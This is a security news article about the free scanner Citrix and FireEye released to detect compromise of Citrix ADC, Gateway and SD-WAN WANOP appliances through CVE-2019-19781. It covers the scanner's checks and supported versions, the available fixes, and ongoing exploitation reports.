Citrix released a free scanner for detecting compromised Citrix Application Delivery Controller (ADC), Citrix Gateway, and Citrix SD-WAN WANOP appliances by digging for indicators of compromise (IoC) collected in incident response engagements related to CVE-2019-19781 exploitation.
The tool was developed in collaboration with FireEye and it is designed to be used locally to scan their organizations Citrix instances, one appliance at a time, to get assessments of potential indications of compromise found on the systems.
Citrix Senior Director Karen Master told BleepingComputer that "right now there are no plans for scanning in parallel" when asked if there any plans to add support for network scanning.
"The goal of the scanner is to analyze available log sources and system forensic artifacts to identify evidence of successful exploitation of CVE-2019-19781," Citrix says.
"There are limitations in what the tool will be able to accomplish, and therefore, executing the tool should not be considered a guarantee that a system is free of compromise."
How to use the Citrix IoC scanner
While it should be launched on a Citrix ADC, Gateway, or SD-WAN WANOP Appliance to scan for known indicators of compromise, the tool can also be used to inspect mounted forensic images of Citrix instances.
The IoC scanner allows you to discover evidence of devices that were successfully compromised by attackers, evidence of attackers having scanned vulnerable Citrix servers, as well as evidence of failed scanning attempts.
According to Citrix, the scanner can be used to identify:
• file system paths of known malware
• post-exploitation activity in shell history
• known malicious terms in NetScaler directories
• unexpected modification of NetScaler directories
• unexpected crontab entries
• unexpected processes
• ports used by known malware
The CVE-2019-19781 IoC scanner is designed to be used with the following Citrix products:
• Citrix ADC and Citrix Gateway version 12.1
• Citrix ADC and Citrix Gateway version 12.0
• Citrix ADC and Citrix Gateway version 11.1
• Citrix ADC and Citrix Gateway version 10.5
• Citrix SD-WAN WANOP software and appliance models 4000, 4100, 5000, and 5100
Citrix provides detailed usage details on the tool's GitHub repository and the standalone Bash script can be downloaded from the Citrix and FireEye repositories.
Customers urged to scan their appliances
Citrix and FireEye strongly advise all Citrix customers to run this tool against their appliances as soon as possible to identify potential compromise and to take the steps needed to protect their organization.
Citrix released permanent fixes for ADC versions 11.1 and 12.0 this weekend and provides mitigation measures for ADC versions 12.1, 13, 10.5 and SD-WAN WANOP versions 10.2.6 and 11.0.3 appliances.
A separate tool to check if the mitigations have been successfully applied to vulnerable servers is also available.
The Cybersecurity and Infrastructure Security Agency (CISA) also released a public domain tool to help test if an organization's servers are vulnerable to attacks on January 13.
We are committed to the security of our products & we are making every effort to ensure all customers are supported in response to #CVE201919781. To that end, we have teamed up with @FireEye on a scanner that aids customers in the detection of compromise.https://t.co/Nk8xO95fVv
— Citrix (@citrix) January 22, 2020
Ongoing attacks targeting CVE-2019-19781
Vulnerable Citrix ADC servers are currently being patched against CVE-2019-19781 exploitation attempts by an unknown threat actor who is also deploying backdoors to maintain future access as FireEye researchers discovered.
"FireEye believes that this actor may be quietly collecting access to NetScaler devices for a subsequent campaign," the report says.
Scans for vulnerable Citrix servers started on January 8, while proof-of-concept (PoC) exploits were made public about two days later.
GDI Foundation researcher Victor Gevers found 14,180 vulnerable Citrix endpoints two days ago after Citrix published permanent fixes for some ADC appliance versions, roughly 9,000 less than security firm Bad Packets detected ten days ago.
17 hours ago, Citrix published updates & new fixes for #CVE201919781. 14,180 are still vulnerable. There are sensitive networks unpatched out there. With only a few volunteers we are trying to help (remotely) these organizations that are behind or stuck in the mitigation process. pic.twitter.com/6OkZ5wt7wS
— Victor Gevers (@0xDUDE) January 20, 2020
"While our security and engineering teams have been working around the clock to develop, test and deliver permanent fixes to CVE-2019-19781, we have been actively thinking of ways to assist our customers in understanding if and how their systems may have been affected," Citrix’s Chief Information Security Officer Fermin J. Serna said.
"We partnered with FireEye Mandiant, which is at the forefront of cyber threat intelligence and forensic analysis, to develop a tool that leverages their knowledge of recent attacks against CVE-2019-19781 to help organizations identify potential compromises."
Post a Comment Community Rules
You need to login in order to post a comment
Not a member yet? Register Now